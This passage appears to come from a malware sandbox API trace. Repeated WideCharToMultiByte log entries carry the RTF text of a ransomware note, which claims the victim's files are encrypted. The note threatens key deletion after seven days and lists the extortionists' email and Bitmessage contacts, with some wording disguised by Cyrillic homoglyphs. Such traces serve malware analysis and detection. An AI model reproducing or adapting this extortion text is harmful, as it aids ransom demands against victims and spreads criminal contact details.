Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.382] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.382] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x38dfac8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t 